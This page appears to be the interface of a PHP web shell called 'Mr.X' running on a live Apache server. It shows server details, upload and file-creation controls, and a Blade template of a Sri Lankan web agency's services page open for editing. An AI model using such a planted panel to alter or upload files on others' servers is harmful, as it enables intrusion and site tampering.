🤩 File Manager - Mr.X
PHP:
8.3.33
Server:
Apache
OS:
Linux 5.14.0-611.49.1.el9_7.x86_64
User:
websparkit
Navigate
Upload:
Upload
New File
New Folder
Editing:services.blade.php
@extends('layouts.public') @section('title', 'Our Services | Web Development & SEO Services Sri Lanka') @section('meta_description', 'Explore our services: Ecommerce website development, SEO services Sri Lanka, WordPress website Sri Lanka, and AI web design Sri Lanka.') @section('meta_keywords', 'ecommerce website development sri lanka, SEO services sri lanka, wordpress website sri lanka, mobile app development sri lanka, logo design sri lanka, digital marketing agency sri lanka, content writing sri lanka, ai web design sri lanka, generative engine optimization') @section('content') <div class="bg-navy text-white py-16"> <div class="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8 text-center"> <h1 class="text-4xl font-bold">Our Services</h1> <p class="mt-4 text-xl">Comprehensive digital solutions to accelerate your business growth.</p> </div> </div> <div class="py-16 bg-gray-50"> <div class="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8"> <div class="grid grid-cols-1 md:grid-cols-2 gap-8"> <div id="ecommerce" class="bg-white p-8 rounded-lg shadow-sm"> <h3 class="text-2xl font-bold text-navy mb-4">Ecommerce Website Development Sri Lanka</h3> <p class="text-gray-600">We build high-converting online stores using cutting-edge technologies. Sell your products globally with secure payment gateways and beautiful product displays.</p> </div> <div id="wordpress" class="bg-white p-8 rounded-lg shadow-sm"> <h3 class="text-2xl font-bold text-navy mb-4">WordPress Website Sri Lanka</h3> <p class="text-gray-600">Need a blog, corporate site, or news portal? Our custom WordPress development ensures your site is fast, secure, and easy to manage.</p> </div> <div id="seo" class="bg-white p-8 rounded-lg shadow-sm"> <h3 class="text-2xl font-bold text-navy mb-4">SEO Services Sri Lanka</h3> <p class="text-gray-600">As a top digital marketing agency in Sri Lanka, we provide comprehensive SEO, content writing Sri Lanka, and Google Ads management to drive organic and paid traffic.</p> </div> <div id="mobile" class="bg-white p-8 rounded-lg shadow-sm"> <h3 class="text-2xl font-bold text-navy mb-4">Mobile App Development Sri Lanka</h3> <p class="text-gray-600">Take your business mobile with our custom iOS and Android app development services. We build intuitive and fast applications.</p> </div> <div id="design" class="bg-white p-8 rounded-lg shadow-sm"> <h3 class="text-2xl font-bold text-navy mb-4">Logo Design Sri Lanka</h3> <p class="text-gray-600">Your brand starts here. Our creative team designs memorable logos and brand identities that resonate with your target audience.</p> </div> <div id="ai" class="bg-white p-8 rounded-lg shadow-sm border-l-4 border-orange"> <h3 class="text-2xl font-bold text-navy mb-4">AI Web Design Sri Lanka</h3> <p class="text-gray-600">Future-proof your business with our AI-driven website creation. We specialize in Generative Engine Optimization to ensure your content ranks on AI-powered search engines.</p> </div> </div> </div> </div> @endsection
Save Changes
Cancel
Create New File
Create New Folder